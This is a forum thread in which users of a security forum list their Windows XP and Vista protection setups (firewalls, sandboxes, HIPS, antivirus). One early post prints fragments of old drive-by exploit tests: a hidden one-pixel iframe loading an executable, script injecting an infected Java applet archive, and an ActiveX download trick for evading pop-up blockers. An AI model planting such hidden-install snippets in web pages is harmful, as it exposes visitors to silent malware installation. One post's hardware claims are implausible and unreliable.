What is your security setup these days?

I've not found this to be so. Every IE exploit I've tested where it's patched, brings up a prompt download box.

Just now I ran an iframe test. Opening to the page triggers a remote code install attempt:

Code:

<iframe src="exp.exe" width=1 height=1></iframe>

__________________________________________________

From old on-line tests:

Remote install of an infected .jar file:

Code:

Trojan_Path=Trojan_Path+"MS03-11";
      ObjectContainer.innerHTML= applet archive="'+InetPath+'/'+'ie0601a.jar" 
codebase="'+InetPath+'"

_____________________________________________________________-

Remote install of .dll

Code:

hrResponseHdr: 0, URL: (http://activex.microsoft.com/objects/ocget.dll)

(this is used to help the exploit to bypass pop-up blockers)


_________________________________________________________________________


Remote install an infected Plugin


__________________________________________________________________

For the Zero-day occurrence, Easter's suggestion for HIPS will take care of it.


----
rich

 

After trying a few setups for the home XP box (shared use PC), I settled for a pop-up quiet and an inbound prevention based approach.

Being a former IT specialist (that was 18 years ago, systems design, data base administration and mainframe/green screen communication specialist), I have a great trust in policy and rights management.

Since XP Home versions come without policy management, and this policy management is way to difficult for the average PC user, I have bought DefenseWall (andbefore that GeSWall to try out).

I now have on XP sp3 box:

First level of Defense
Network stack is the first contact with the external world, therefore you need a firewall. When you are not a firewall specialist (which are loaded with classical HIPS functionality, eg D+ of Comodo), the default XP firewall will do for daily home PC issues. We are behind a hardware FW (NAT/SPI) and XP's FW.

Second level of defense
This is the process stack. DefenseWall to mitigate all internet facing aps in very powerfull limited user environment, it also chains downloaded files, paralising most malware. I have used the resource protection option to get additional protection (see https://www.wilderssecurity.com/showpost.php?p=1248922&postcount=21).

Third level of defense
Realtime check on known malware on INCOMING data streams only! Preventing to enter it om the PC is why I use this (not for post infection situations).
I re-installled Avast and only use the Network shield (filters on worms and backdoors), Internet-mail (outlook express) , P2P (limewire). Messenger shield and outlook shield and the standard shield (for real time protection of data/executables on your PC) are niot installed. ThreatFire will replace the protectio offered by the standard shield, messenger and outlook are not used on this PC.

Fourth level of Defense
Install ThreatFire, add the extra rule for outboud protection. When executable code and data arrives on your harddisk, TF will guard them, not by scanning all actions or trying to control all attack vectors (like D+ of Comodo). In stead it monitors sensible area's of your PC and looks for bad behavior. When an intrusion triggers ThreatFire, it will track all actions of the intrudor. When the intrudor has collected enough bad behavor points, TF will trigger a pop-up AFTER checking its Anti Virus blacklist data base first. So when TF warns you, you known that it is not a known malware. So it can be a false positive or a zero day threat. TF has a reputation of throwing close to zero false positives at you. Besides that you can always Google for the program causing the warning (just click "learn more on this threat". Consider TF your gate keeper/goal keeper protecting your system on process and data level, with a blacklist and behavior blocking HIPS.

Regards Kees

Note it is the combo which provides a good solution. You can use other freeware, like Comodo/OA are both FW's which provide more leaktest protection (DW and TF will prevent or arrest all intruders), Avira is a better freeware AV than Avast (but fails the extra options of Avast to pre-check inbound data flows). For less than 20 bucks annual this setup is a bargain.

Opera is the browser of choice on this old CPU, because it is really fast compared to IE7 and FireFox. We have the Opera skinned as it were IE7 (so other users only said, geh it is faster), so they did not noticed the change

 

LOL

 

Update:

Uninstalled ThreatFire because of:

While I wait for EQS 4.0 to become final, I'm installing OA free, which seems easy to use, and for what I've read, is very effective. I like the "run safer" feature.

Is there a way to make Firefox always run with limited rights? It already starts sandboxed, I would like to have it sandboxed and limited.


PS: The other 2 options I'm considering are:
1.- try DriveSentry
2.- Rely only on SBIE and Returnil

 

You can do that with Onliner Armor, DefenseWall, DropMyRights etc. Of course you use that OA because you already have it installed

 

Active
Look'n'Stop
DefenseWall
AntiBot

On Demand
DrWeb CureIt
Malwarebytes AntiMalware

Opera

 

ACTIVE

ZoneAlarm Pro
GeSWall
ThreatFire
avast!

ON-DEMAND

MalwareBytes Anti-Malware
Dr.WEB
GMER
RootkitRevealer
AVZ

BACK UP/RECOVERY

Acronis True Image

 

Right now but change rather quickly for the fun of it

OA,DS,DrW n MBAM

 

Another update in less than 24 hours!

I decided to trial other apps before settling down on one.

Replaced OA free (which I liked a lot, and might come back later), with AE.
Finally I made up my mind and decided to try this. So far, I'm loving it. I feel more secure than ever with this thing on board.

I do feel that it can bring to frustration with time, since it's VERY tight! We'll see, I have 30 days left

Next on the trial list will be DriveSentry (unless I decide AE is the final solution).

 

I used to use proxomitron, can't remember why I stopped. Certainly I will try it again if you post your ruleset.

 

Avira-Anti vir
A-squared2 free
Malwarebytes anti malware
A-squared Hi-jack free
firefox browser
Kerio Personal firewall
Fully updated Xp Service pack 3

 

New setup on 'dummy' PC:

On-Access:
DriveSentry
ZoneAlarm FW (this seems to be a system-hogger )
BOClean
SnoopFree
Winpatrol


On-Demand:
Advanced WindowsCare Personal
SAS Free


Browsers:
Opera w/ Sandboxie
Flock 1.2b


Utilities:
Auslogics BoostSpeed
CCleaner
Recuva

 

Yes, I tried it too, my system was much slower, ditched it the same day.

 

added
changed
removed


XP setup 1 + 2

Vista setup 1 + 2

Resident:

Windows Firewall

Other Security / System Hardening:

vLite'd Windows Vista SP1 (with service tweaking)
xp-AntiSpy
Process Explorer
Firefox extensions: AdBlock Plus, and Permit Cookies

 

WSFuser,
So, I assume no problems since going naked?
Do you check periodically with any scanners or no?
Just curious.

 

No problems.

I havent done any scans yet but I will later.

 

1)Windows xp3 firewall/updated
2)D.E.P/on all programs
3)SandBoxie paid/partime during the day time for me
4)DefenseWall Hips/partime during evening for wife
5)AppRanger(deny persistent changes to system,white/black lists)(lock down system)during the day partime only.for me
6)SpyWareBlaster paid

 

ACTIVE (behind router)

Nod32 2.7
ThreathFire
SandboxIE with Opera 9.5

ON-DEMAND

MalwareBytes Anti-Malware
WinPatrol
SUPERAntiSpyware Free

BACK UP/RECOVERY

DriveImage XML

 

EAZ-FIX 8.1 Pro
Avira AntiVir 8.0 Premium
Evidence Eliminator 6.0

I practice the Boot-to-Restore concept:

-While I'm Online, Avira's Web scanner and Guard
ensure my protection.

-When I disconnect my dial-up ADSL,
I rollback my system to a malware-free snapshot created
on the day I formated my PC.

-For my e-mail, I use Gmail.

> No more Firewalls and Sandboxes that slowed down my Internet Browsing speed!
> No more crazy/silly HIPS that alarmed me on the most obvious processes!

 

New setup in sig.

 

gaining weight? LOL

 

I'm still short in an area i would love to cover with a behavioral blocker but TF is way much for my needs, so i'm patiently in wait for some other to surface if ever. Maybe DriveSentry? Or if i get my hands on an old old version of CyberHawk again. LoL

In the meantime EQS 4.0 (beta) is still holding it's own very well with Alcyon's RuleSets and some additional custom tweaking of my own.

I got dizzy with Comodo D+ so the trade off back to my mainstream Kerio 2.15 with BZ Kerio 2x Default Replacment - Advanced - Final.conf rules combined with EQS 4.0 (beta) is not only beefed up confidence/protection again, but scaled down the noise and WEIGHT!

SandboxIE is always in attendance.

I'm working more now toward a more modular & trimmer, but aggressively defensive setup with "Lite" apps as opposed to the more heavier types when available.

Experimenting with xp-AntiSpy, Samurai, and Ozone and other set-in-place/hardening apps and forget it, then top them all off with LUA proggy like SuRun.

Still looks like Faronic's AE is going to keep being an integral part of my best protection additions also.

I'm making like there are no such things as any Virtual Systems, ISR's, like DF, FD-ISR, Returnil for awhile.

 

Hi Easter,

I tried AE for a while and, although I like the approach it takes, I found that EQS is probably sufficient for me.

If a new executable tries to run, EQS tells me. I may even put an automatic block on all unknown executables from running now that I have confidence in my application rules. I already have an automatic block on creation and modification of all new executables.

I gave up on my behavioural blocker Mamutu. I couldn't get on with the 'behaves-like' messages. I kept getting behaves-like this and behaves-like that with no explanation as to WHY. I prefer the pure logic of EQS.

 

Hy for best security i use windows vista live dvd costm made a x64 vers
that mean it's read only .truh i have a very powerfull sistem itanium based
4x 4x core = 16 core =40Ghz 128MBx4 chace 132GB ram around 10x 500Mb
scsi HDD crypted with 10MB custom cryption key

 

I completely agree. EQS is quite sufficient AS-IS, and you can tailor exactly the right RULES needed for each situation as see fit.

AE added to EQS is going to extremes for most users and i only really need it for local research and testing purposes mostly.

And how about that EQS? "Lite", but deceptively energetic & responsive plus equally aggressive in defense.